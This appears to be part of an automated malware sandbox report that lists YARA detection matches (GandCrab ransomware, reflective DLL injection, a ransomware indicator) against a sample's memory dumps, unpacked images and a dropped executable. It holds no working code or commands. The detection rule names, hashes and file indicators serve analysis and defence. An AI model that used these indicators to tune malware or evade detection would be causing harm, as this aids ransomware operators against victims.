                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: Gandcrab Payload Author: kevoreilly
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPEDMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: IJr8RvvhZ3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
